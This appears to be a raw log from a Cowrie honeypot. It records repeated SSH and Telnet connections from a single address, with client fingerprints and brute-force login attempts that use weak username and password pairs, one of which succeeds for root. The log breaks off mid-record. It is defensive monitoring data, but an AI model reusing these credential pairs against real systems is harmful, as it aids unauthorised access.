{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:50.904472Z","src_ip":"212.227.235.229","session":"016b7b4ca10a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53482,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f3d7604c82","protocol":"ssh","message":"New connection: 212.227.235.229:53482 (1.2.3.4:22) [session: 95f3d7604c82]","sensor":"my-vps","timestamp":"2025-09-09T01:39:51.094221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:51.095037Z","src_ip":"212.227.235.229","session":"95f3d7604c82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:51.334976Z","src_ip":"212.227.235.229","session":"95f3d7604c82"}
{"eventid":"cowrie.login.failed","username":"tom","password":"1234567","message":"login attempt [tom/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:39:51.604012Z","src_ip":"212.227.235.229","session":"87986beee13d"}
{"eventid":"cowrie.login.failed","username":"builder","password":"builder.123","message":"login attempt [builder/builder.123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:39:52.031823Z","src_ip":"212.227.235.229","session":"016b7b4ca10a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:39:52.340301Z","src_ip":"212.227.235.229","session":"95f3d7604c82"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:52.830194Z","src_ip":"212.227.235.229","session":"87986beee13d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:53.295334Z","src_ip":"212.227.235.229","session":"016b7b4ca10a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:53.582458Z","src_ip":"212.227.235.229","session":"95f3d7604c82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49070,"dst_ip":"1.2.3.4","dst_port":22,"session":"73c87b428a05","protocol":"ssh","message":"New connection: 212.227.235.229:49070 (1.2.3.4:22) [session: 73c87b428a05]","sensor":"my-vps","timestamp":"2025-09-09T01:39:53.824758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:39:53.825424Z","src_ip":"212.227.235.229","session":"73c87b428a05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:39:54.067610Z","src_ip":"212.227.235.229","session":"73c87b428a05"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:39:55.079184Z","src_ip":"212.227.235.229","session":"73c87b428a05"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:55.322923Z","src_ip":"212.227.235.229","session":"ff65605291e2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:39:55.323978Z","src_ip":"212.227.235.229","session":"73c87b428a05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60890,"dst_ip":"1.2.3.4","dst_port":22,"session":"09817051ddb8","protocol":"ssh","message":"New connection: 212.227.235.229:60890 (1.2.3.4:22) [session: 09817051ddb8]","sensor":"my-vps","timestamp":"2025-09-09T01:40:15.542354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:40:15.543430Z","src_ip":"212.227.235.229","session":"09817051ddb8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:40:15.801444Z","src_ip":"212.227.235.229","session":"09817051ddb8"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345678","message":"login attempt [tester/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:40:16.874703Z","src_ip":"212.227.235.229","session":"09817051ddb8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:40:18.135943Z","src_ip":"212.227.235.229","session":"09817051ddb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46526,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dd516e30931","protocol":"ssh","message":"New connection: 212.227.235.229:46526 (1.2.3.4:22) [session: 6dd516e30931]","sensor":"my-vps","timestamp":"2025-09-09T01:40:38.132959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:40:38.133779Z","src_ip":"212.227.235.229","session":"6dd516e30931"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:40:38.371854Z","src_ip":"212.227.235.229","session":"6dd516e30931"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qweASD","message":"login attempt [admin/123qweASD] failed","sensor":"my-vps","timestamp":"2025-09-09T01:40:39.363135Z","src_ip":"212.227.235.229","session":"6dd516e30931"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:40:40.604485Z","src_ip":"212.227.235.229","session":"6dd516e30931"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53256,"dst_ip":"1.2.3.4","dst_port":22,"session":"75299f49ad46","protocol":"ssh","message":"New connection: 212.227.235.229:53256 (1.2.3.4:22) [session: 75299f49ad46]","sensor":"my-vps","timestamp":"2025-09-09T01:40:46.955821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:40:46.956944Z","src_ip":"212.227.235.229","session":"75299f49ad46"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:40:47.075714Z","src_ip":"212.227.235.229","session":"75299f49ad46"}
{"eventid":"cowrie.login.failed","username":"agouser","password":"agouser123","message":"login attempt [agouser/agouser123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:40:47.588657Z","src_ip":"212.227.235.229","session":"75299f49ad46"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:40:48.709374Z","src_ip":"212.227.235.229","session":"75299f49ad46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33528,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6fabc99eaa1","protocol":"ssh","message":"New connection: 212.227.235.229:33528 (1.2.3.4:22) [session: e6fabc99eaa1]","sensor":"my-vps","timestamp":"2025-09-09T01:40:55.898558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:40:55.899591Z","src_ip":"212.227.235.229","session":"e6fabc99eaa1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:40:56.214411Z","src_ip":"212.227.235.229","session":"e6fabc99eaa1"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"12345678","message":"login attempt [ahmad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:40:57.475922Z","src_ip":"212.227.235.229","session":"e6fabc99eaa1"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:40:58.794265Z","src_ip":"212.227.235.229","session":"e6fabc99eaa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49416,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa5b7e1efddf","protocol":"ssh","message":"New connection: 212.227.235.229:49416 (1.2.3.4:22) [session: fa5b7e1efddf]","sensor":"my-vps","timestamp":"2025-09-09T01:41:09.382429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:09.383216Z","src_ip":"212.227.235.229","session":"fa5b7e1efddf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:09.490292Z","src_ip":"212.227.235.229","session":"fa5b7e1efddf"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:41:09.960053Z","src_ip":"212.227.235.229","session":"fa5b7e1efddf"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:41:11.070052Z","src_ip":"212.227.235.229","session":"fa5b7e1efddf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49437,"dst_ip":"1.2.3.4","dst_port":23,"session":"62281497df5d","protocol":"telnet","message":"New connection: 212.227.235.229:49437 (1.2.3.4:23) [session: 62281497df5d]","sensor":"my-vps","timestamp":"2025-09-09T01:41:12.949018Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39828,"dst_ip":"1.2.3.4","dst_port":22,"session":"65e69d9e4f23","protocol":"ssh","message":"New connection: 212.227.235.229:39828 (1.2.3.4:22) [session: 65e69d9e4f23]","sensor":"my-vps","timestamp":"2025-09-09T01:41:13.410703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:13.411395Z","src_ip":"212.227.235.229","session":"65e69d9e4f23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:13.651987Z","src_ip":"212.227.235.229","session":"65e69d9e4f23"}
{"eventid":"cowrie.login.failed","username":"csserver","password":"csserver","message":"login attempt [csserver/csserver] failed","sensor":"my-vps","timestamp":"2025-09-09T01:41:14.654443Z","src_ip":"212.227.235.229","session":"65e69d9e4f23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39010,"dst_ip":"1.2.3.4","dst_port":22,"session":"c74f29d4e78c","protocol":"ssh","message":"New connection: 212.227.235.229:39010 (1.2.3.4:22) [session: c74f29d4e78c]","sensor":"my-vps","timestamp":"2025-09-09T01:41:14.765718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:14.766922Z","src_ip":"212.227.235.229","session":"c74f29d4e78c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43597,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b147cb16aeb","protocol":"ssh","message":"New connection: 212.227.235.229:43597 (1.2.3.4:22) [session: 5b147cb16aeb]","sensor":"my-vps","timestamp":"2025-09-09T01:41:14.780987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:41:14.781795Z","src_ip":"212.227.235.229","session":"5b147cb16aeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:41:15.022179Z","src_ip":"212.227.235.229","session":"5b147cb16aeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes1